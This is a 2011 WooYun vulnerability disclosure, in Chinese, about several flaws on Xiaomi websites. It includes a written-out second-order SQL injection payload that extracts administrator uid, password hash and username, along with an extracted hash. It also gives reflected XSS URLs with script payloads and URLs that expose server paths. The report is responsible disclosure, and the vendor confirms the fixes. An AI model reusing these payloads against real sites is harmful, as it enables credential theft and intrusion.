漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-03467
漏洞标题:小米科技网站漏洞全集
相关厂商:小米科技
漏洞作者: Jannock
提交时间:2011-11-29 09:00
修复时间:2011-12-29 09:01
公开时间:2011-12-29 09:01
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:6
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-11-29: 细节已通知厂商并且等待厂商处理中
2011-11-29: 厂商已经确认,细节仅向厂商公开
2011-12-09: 细节向核心白帽子及相关领域专家公开
2011-12-19: 细节向普通白帽子公开
2011-12-29: 细节向实习白帽子公开
2011-12-29: 细节向公众公开
简要描述:
简单通过Google搜索了一下,发现多个大小问题。
详细说明:
1、米聊官方论坛二次注入。
http://www.discuz.net/thread-2354532-1-1.html
打补丁。
2、跨站脚本
http://mi.xiaomi.com/%E6%96%B9%E8%B6%85x%3Cscript%3Ealert%28/ss/%29%3C/script%3E/5
3、跨站脚本
http://mi.xiaomi.com/info.php?i=1&u=%CB%D5%B9%DA%BB%AA%27&e=354111841%40qq.com%27%3Cscript%3Ealert%28/s/%29;%3C/script%3E
4、程序出错暴路径
http://blog.xiaomi.com/wp-content/themes/xiaomi/
5、程序出错暴路径
http://hd.xiaomi.com/index.php?action=rank&date=2011-11-13%27
漏洞证明:
1、x',`subject`=(/*!select*/ concat(uid,'|',password,'|',username) from pre_common_member where groupid=1 limit 0,1),comment='
4275|fd9d2eba79764c080a3c2f9d5ab7e4a7|麦兜在扫地
2、略
3、略
4、
Fatal error: Call to undefined function get_header() in /data/www/blog.xiaomi.com/wwwroot/wp-content/themes/xiaomi/index.php on line 7
5、
Fatal error: Uncaught exception 'Exception' with message 'DateTime::__construct(): Failed to parse time string (2011-11-13\') at position 10 (\): Unexpected character' in /data/www/hd.xiaomi.com/action/rank.action.php:51 Stack trace: #0 /data/www/hd.xiaomi.com/action/rank.action.php(51): DateTime->__construct('2011-11-13\'') #1 /data/www/hd.xiaomi.com/action/rank.action.php(40): rank->index() #2 /data/www/hd.xiaomi.com/action/rank.action.php(98): rank->init() #3 /data/www/hd.xiaomi.com/web/index.php(100): require('/data/www/hd.xi...') #4 {main} thrown in /data/www/hd.xiaomi.com/action/rank.action.php on line 51
修复方案:
您懂得!
版权声明:转载请注明来源 Jannock@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2011-11-29 10:01
厂商回复:
灰常灰常感谢您的报告,已经内部处理中!
最新状态:
2011-11-29:第四项、第五项已经修复。其它ing
2011-11-29:所有上报问题已经全部fix,再次感谢filer
( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)